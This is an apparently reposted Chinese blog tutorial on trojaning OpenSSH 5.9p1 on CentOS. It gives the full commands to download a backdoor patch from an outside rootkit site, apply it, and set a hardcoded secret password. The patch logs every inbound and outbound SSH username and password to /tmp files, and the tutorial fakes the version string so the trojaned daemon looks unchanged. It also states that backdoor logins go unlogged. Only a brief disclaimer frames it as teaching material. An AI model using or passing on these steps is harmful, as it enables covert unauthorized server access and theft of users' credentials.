zoukankan      html  css  js  c++  java
  • 如何使用Linux通用后门(转zafe)

    特别提示:仅用于安全测试和教学,禁止非法用途。

    标题党了,呵呵

    其实就是个ssh后门,基本可以不用看内核版本,很简单,为照顾新手!

    *************************************************************************

    地址在这http://core.ipsecs.com/rootkit/patch-to-hack/(已被墙)

    我以 openssh 5.9    centos 5.6 做演示

    在这里找到对应的openssh版本 http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/

    安装前首先

    ssh -V

    记录下原来ssh版本信息,免得安装后一看就版本不一样了

     wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz tar zxvf openssh-5.9p1.tar.gz tar zxvf 0x06-openssh-5.9p1.patch.tar.gz cd openssh-5.9p1.patch/ cp sshbd5.9p1.diff../openssh-5.9p1 cd ../openssh-5.9p1 patch < sshbd5.9p1.diff//patch 后门

     

    vi includes.h                   //修改后门密码,记录文件位置,/*
    +#define ILOG "/tmp/ilog"                      //记录登录到本机的用户名和密码
    +#define OLOG "/tmp/olog"                   //记录本机登录到远程的用户名和密码
    +#define SECRETPW "123456654321"    //你后门的密码
    */

    vi version.h                                           //修改ssh版本信息,改成原来的

    先安装所需环境不然会报错

    yum install -y openssl openssl-devel pam-devel
    ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

    注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log

    需要安装zlib

    yum install -y zlib zlib-devel    //  http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download  需要 make clean
    make && make install
    service sshd restart          //重启sshd

    然后我们登录ssh看看

    再ssh localhost看看

      

    使用后门密码登录是不会被记录的

    后门,记录一举两得,是不是很简单

  • 相关阅读:
    Java性能小技巧
    使用Gitolite搭建Gitserver
    refresh的停车场(栈和队列的STL)
    BZOJ 2005 NOI2010 能量採集 数论+容斥原理
    PHP第四课 了解经常使用的函数
    JavaScript实现对象数组按不同字段排序
    android之Context对各种服务的管理
    程序员应该阅读的非编程类书籍有哪些?
    是男人就下100层【第五层】——换肤版2048游戏
    是男人就下100层【第四层】——Crazy贪吃蛇(3)
  • 原文地址:https://www.cnblogs.com/demonspider/p/3196936.html
Copyright © 2011-2022 走看看